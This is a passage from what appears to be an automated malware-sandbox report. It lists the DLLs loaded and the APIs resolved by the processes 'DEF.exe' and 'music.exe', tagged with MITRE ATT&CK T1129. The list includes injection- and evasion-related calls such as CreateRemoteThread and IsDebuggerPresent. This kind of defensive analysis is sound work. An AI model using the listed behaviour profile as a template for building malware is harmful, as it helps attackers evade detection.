\"%WINDIR%\\SYSTEM32\\TWEXT.DLL\" at base 6b3d0000\n \"DEF.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CSCUI.DLL\" at base 72430000\n \"DEF.exe\" loaded module \"RPCRT4.DLL\" at base 76ba0000\n \"DEF.exe\" loaded module \"CSCAPI.DLL\" at base 706c0000\n \"DEF.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 75b00000\n \"DEF.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 75b00000\n \"DEF.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CSCOBJ.DLL\" at base 72380000\n \"DEF.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75b00000\n \"DEF.exe\" loaded module \"CRYPTSP.DLL\" at base 751b0000\n \"DEF.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74f40000\n \"DEF.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75740000\n \"DEF.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 76c50000\n \"DEF.exe\" loaded module \"USERENV.DLL\" at base 75a00000\n \"DEF.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76380000\n \"DEF.exe\" loaded module \"SETUPAPI.DLL\" at base 761e0000\n \"DEF.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6e7d0000\n \"DEF.exe\" loaded module \"%PROGRAMFILES%\\MICROS~3\\OFFICE14\\GROOVEEX.DLL\" at base 6fa40000\n \"DEF.exe\" loaded module \"%PROGRAMFILES%\\COMMON~1\\MICROS~1\\OFFICE14\\CULTURES\\OFFICE.ODF\" at base 6f470000\n \"DEF.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NTSHRUI.DLL\" at base 723b0000\n \"DEF.exe\" loaded module \"SRVCLI.DLL\" at base 753a0000\n \"DEF.exe\" loaded module \"SLC.DLL\" at base 73ca0000\n \"DEF.exe\" loaded module \"IMM32.DLL\" at base 77a00000\n \"DEF.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SYNCUI.DLL\" at base 6b560000\n \"DEF.exe\" loaded module \"%PROGRAMFILES%\\7-ZIP\\7-ZIP.DLL\" at base 10000000\n \"DEF.exe\" loaded module \"%LOCALAPPDATA%\\MICROSOFT\\ONEDRIVE\\17.3.4604.0120\\FILESYNCSHELL.DLL\" at base 70b70000\n \"DEF.exe\" loaded module \"%WINDIR%\\SYSTEM32\\ACPPAGE.DLL\" at base 6cbe0000\n \"DEF.exe\" loaded module \"DEVRTL.DLL\" at base 74f20000\n \"DEF.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 765c0000\n \"DEF.exe\" loaded module \"SECUR32.DLL\" at base 754e0000\n \"DEF.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75a30000\n \"DEF.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 705f0000\n \"DEF.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75650000\n \"DEF.exe\" loaded module \"NETUTILS.DLL\" at base 73e50000\n \"music.exe\" loaded module \"RSTRTMGR\" at base 6cb90000\n \"music.exe\" loaded module \"KERNEL32.DLL\" at base 76380000\n \"music.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75650000\n \"music.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70eb0000\n \"music.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"music.exe\" loaded module \"KERNEL32\" at base 76380000\n \"music.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"music.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 5e0000\n \"music.exe\" loaded module \"%WINDIR%\\TEMP\\VXSSL32.DLL\" at base 1670000\n \"music.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-1\" at base 0\n \"music.exe\" loaded module \"EXT-MS-WIN-KERNEL32-PACKAGE-CURRENT-L1-1-0\" at base 0\n \"music.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 660000\n \"music.exe\" loaded module \"%WINDIR%\\TEMP\\VXSSL32.DLL\" at base 490000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"DEF.exe\" called \"LoadLibrary\" with a parameter Rstrtmgr (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter CSCAPI.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\shell32.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter %PROGRAMFILES%\\MICROS~3\\Office14\\GROOVEEX.DLL (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter %PROGRAMFILES%\\COMMON~1\\MICROS~1\\OFFICE14\\Cultures\\office.odf (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter srvcli.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter cscapi.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter slc.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter SETUPAPI.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter DEVRTL.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter imageres.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00006032)\n \"DEF.exe\" called \"LoadLibrary\" with a parameter netutils.dll (UID: 00000000-00006032)\n \"music.exe\" called \"LoadLibrary\" with a parameter Rstrtmgr (UID: 00000000-00006012)\n \"music.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006012)\n \"music.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006012)\n \"music.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006012)\n \"music.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006012)\n \"music.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-1 (UID: 00000000-00006012)\n \"music.exe\" called \"LoadLibrary\" with a parameter ext-ms-win-kernel32-package-current-l1-1-0 (UID: 00000000-00006012)\n \"music.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004492)\n \"music.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004492)\n \"music.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004492)\n \"music.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004492)\n \"music.exe\" called \"LoadLibrary\" with a parameter ext-ms-win-kernel32-package-current-l1-1-0 (UID: 00000000-00004492)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"DEF.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter RmGetList (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter RmEndSession (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter OfflineFilesQueryStatus (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter CoWaitForMultipleHandles (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter ReleaseStgMedium (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter CoGetMalloc (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter IsProcessorFeaturePresent (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter HeapSetInformation (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter GrooveChainGetGlobalInterfacePtrAddress (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter GrooveChainCoCreateInstance (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter NetShareEnum (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter CscNetApiGetInterface (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter SLGetWindowsInformationDWORD (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter ProcessIdToSessionId (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter ImmCreateContext (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter ImmDestroyContext (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter FindFirstStreamW (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter FindNextStreamW (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter PnpIsFilePnpDriver (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter DevRtlGetThreadLogToken (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter NetApiBufferFree (UID: 00000000-00006032)\n \"DEF.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00006032)\n \"music.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter RmRegisterResources (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter RmGetList (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter RmEndSession (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter ZwCreateSection (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter ZwMapViewOfSection (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter ZwUnmapViewOfSection (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter ZwClose (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter send (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter LoadLibraryW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter FindFirstFileA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter FindFirstFileW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter FindNextFileA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter FindNextFileW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter Process32FirstW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter Process32NextW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateRemoteThread (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetNativeSystemInfo (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetLogicalDriveStringsA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetLogicalDriveStringsW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CopyFileA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CopyFileW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateDirectoryA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateDirectoryW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter RemoveDirectoryA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter RemoveDirectoryW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter WinExec (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter FindResourceA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter FindResourceW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter LoadResource (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateProcessW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter OpenMutexA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter OpenMutexW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultLangID (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter SetFileTime (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter MoveFileA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetWriteWatch (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter HeapWalk (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GlobalMemoryStatusEx (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter IsNativeVhdBoot (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter DebugBreak (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter RtlGetNtProductType (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter LdrLoadDll (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter LdrUnloadDll (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter LdrGetDllHandle (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter LdrGetProcedureAddress (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter RtlAddVectoredExceptionHandler (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter NtSystemDebugControl (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter RtlCompressBuffer (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter RtlDecompressBuffer (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter RtlDecompressBufferEx (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter CreateCompatibleBitmap (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetDeviceCaps (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetIpNetTable (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetAdaptersInfo (UID: 00000000-00006012)\n \"music.exe\" called \"GetProcAddress\" with a parameter GetTcpTable2 (UID: 00000000-00006012)\n 